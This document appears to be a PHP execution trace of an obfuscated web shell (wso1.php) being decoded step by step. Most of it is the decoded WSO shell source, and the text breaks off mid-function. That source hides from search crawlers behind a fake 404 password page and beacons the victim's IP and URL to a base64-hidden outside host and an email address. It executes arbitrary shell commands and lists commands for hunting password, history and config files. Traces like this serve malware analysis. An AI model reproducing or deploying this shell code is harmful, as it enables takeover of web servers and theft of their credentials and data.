2	6	0	0.000517	427016	htmlspecialchars_decode	0		/var/www/html/uploads/wso1.php	4	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	1	0.000534	427048
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	7	0	0.000561	428576	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'	/var/www/html/uploads/wso1.php	4	0
3	8	0	0.000577	428576	strrev	0		/var/www/html/uploads/wso1.php(4) : eval()'d code	1	1	'==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
3	8	1	0.000630	461376
3	8	R			'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	0	0.000675	461344	base64_decode	0		/var/www/html/uploads/wso1.php(4) : eval()'d code	1	1	'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	1	0.000791	494144
3	9	R			'\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3	10	0	0.001238	461344	gzinflate	0		/var/www/html/uploads/wso1.php(4) : eval()'d code	1	1	'\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3	10	1	0.001687	485952
3	10	R			'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3	11	0	0.002133	453152	gzuncompress	0		/var/www/html/uploads/wso1.php(4) : eval()'d code	1	1	'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3	11	1	0.002902	539200
3	11	R			'<?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3	12	0	0.005572	1143752	eval	1	'?><?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n    if($gitt == false){\r\n        @$gitt = file_get_contents($x);\r\n    }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n    @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo \'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. \'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 